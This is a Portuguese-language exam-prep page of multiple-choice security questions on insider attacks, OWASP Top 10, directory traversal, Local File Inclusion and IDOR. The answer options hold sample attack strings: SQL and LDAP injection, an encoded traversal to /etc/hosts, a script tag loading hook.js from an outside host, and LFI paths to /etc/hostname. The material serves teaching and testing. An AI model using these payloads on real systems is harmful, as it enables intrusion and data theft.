

Seu próximo nível começa aqui
Com a Assinatura Ilimitada, você tem tudo que precisa para sua aprovação.
Com a Assinatura Ilimitada, você combina prática, teoria e método em uma única assinatura com tudo que você precisa para sua aprovação.
É correto afirmar que um ataque interno caracterizase, principalmente, pelo fato de
ser realizado exclusivamente por hackers externos à organização
explorar apenas falhas de hardware.
não causar danos significativos à infraestrutura.
estar sempre associado a ataques automatizados.
ser iniciado por indivíduos que possuem acesso legítimo aos sistemas.
Um analista consultou a OWASP Top 10 (Riscos de Segurança em Aplicações Web) de 2021 para, se necessário, corrigir as vulnerabilidades apontadas no ambiente de um Tribunal. Referente ao número 1 da lista, uma das vulnerabilidades comuns é a
existência de eventos auditáveis, como logins, tentativas de login malsucedidas e transações de alto valor, não são registrados em logs.
falta de restrições em métodos como POST, PUT e DELETE, permitindo ações não autorizadas.
ocorrência dos dados fornecidos pelo usuário não serem validados, filtrados ou sanitizados pela aplicação.
falta de proteção de segurança adequada em qualquer parte da stack da aplicação ou permissões configuradas incorretamente em serviços de nuvem.
falta de testes na compatibilidade de bibliotecas atualizadas, modificadas ou corrigidas.
Durante a realização de testes de invasão em uma aplicação Web, um analista encontrou um vetor de ataque para uma travessia de diretórios. Marque a alternativa que possui um payload válido para este ataque.
(&(username=p0wn3d)(password=Pa$$w0rd))
SELECT * FROM tbl_user WHERE username = '' or 1=1--#
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/hosts
blablabla%3Cscript%20src%3D%22https%3A%2F%2Fsites3gur0.foo%2Fhook.js%22%3E%3C%2Fscript%3E
Um servidor Linux (Ubuntu) publicou uma página web. Durante a verificação de vulnerabilidades nessa página foi encontrada a falha conhecida como Local File Inclusion (LFI). Uma das evidências dessa falha foi constatada pelo analista de segurança quando ele manipulou a entrada da variável “page” demandada pela URL da página. O acesso idôneo deve ser realizado por meio da URL apresentada abaixo, na qual o arquivo “aplicacao.php” é passado como parâmetro para a vaiável “page”.
https://192.168.0.1/index.php?page=aplicacao.php
A tabela a seguir, apresenta o resultado da manipulação da vaiável “page”, realizada pelo analista de segurança desta empresa, com arquivos inexistentes no servidor.
Nr | Manipulação | Mensagem retornada pelo servidor |
1 | teste.php | Warning: Include (/var/www/html/site/teste.php): failed to open |
2 | 1 | Warning: Include (/var/www/html/site/1): failedto open |
3 | /../portal.php | Warning: Include (/var/www/html/portal.php): failed to open |
Assinale a opção que apresenta o valor que esse analista deve passar como parâmetro para a variável “page”, explorando a vulnerabilidade de LFI encontrada, para obter acesso ao conteúdo do arquivo “/etc/hostname” desse servidor de páginas.
/etc/hostname
/hostname
/../etc/hostname
/../../etc/hostname
/../../../../etc/hostname
Um servidor de páginas web, Ubuntu Server, publicou na internet um portal de notícias com uma vulnerabilidade. Ela permite que os clientes maliciosos deste servidor tenham acesso a sua estrutura de arquivos e diretórios por meio da manipulação das informações demandadas por uma variável PHP apresentada na URL de acesso desta página web.
Assinale, entre as opções abaixo, aquela que apresenta o tipo de vulnerabilidade presente nesta página web.
LFI – Local File Inclusion.
RFI – Remote File Inclusion.
XSS – Cross-Site Scripting.
SQL Injection.
FPD – Full Path Disclosure.


Seu próximo nível começa aqui

Seu próximo nível começa aqui
Destrave a preparação completa para sua aprovação. Com a Assinatura Ilimitada, você estuda com os melhores professores do Brasil e todos os recursos Gran.
Referências diretas inseguras a objetos, ou IDOR (insecure direct object reference), são vulnerabilidades resultantes de controle de acesso interrompido em aplicativos da Web. Um tipo de ataque é a passagem de diretório, que é a maneira mais simples de explorar uma vulnerabilidade IDOR, bastando simplesmente alterar o valor de um parâmetro na barra de endereço do navegador.
Certo
Errado